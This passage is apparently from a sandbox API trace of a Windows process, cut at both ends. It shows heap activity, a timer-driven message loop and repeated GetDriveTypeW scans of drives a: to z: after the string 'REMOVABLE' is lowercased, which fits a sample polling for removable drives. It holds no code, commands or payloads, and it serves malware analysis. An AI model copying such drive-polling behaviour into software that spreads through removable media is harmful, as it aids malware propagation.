(lpRootPathName="h:\\") returned 0x1 [0219.069] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.069] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.069] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.069] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.069] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.070] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.070] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.070] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.070] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.070] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.070] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.071] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.071] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.071] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.071] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.071] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.072] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.072] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0219.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.073] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0219.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0219.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0219.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0219.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0219.074] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0219.074] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0219.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0219.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.076] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0219.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0219.076] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.076] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0219.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.077] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.077] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.077] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.077] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.084] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0219.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0219.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.085] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.085] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.085] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.085] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.085] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.085] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.086] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.086] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.086] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.087] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.087] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.087] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.087] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.087] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.087] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.088] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.088] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.088] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.088] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.088] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.089] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.089] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.089] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.089] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.089] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.090] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.090] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.090] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.090] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.090] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.090] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.090] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.091] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.091] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.091] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.091] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.091] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0219.091] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.091] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0219.091] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0219.091] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.092] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.092] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0219.092] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0219.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.092] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.092] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.092] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.093] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.093] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.093] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.093] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.093] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.093] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.093] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.094] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.094] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.094] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.094] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.094] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.094] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.095] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.095] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.095] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.095] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.095] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.095] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.096] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.096] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.096] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.096] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.096] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.097] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.098] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.098] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.098] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.098] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.098] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.098] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0219.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0219.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0219.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0219.098] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0219.099] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.099] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.099] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.099] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.099] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 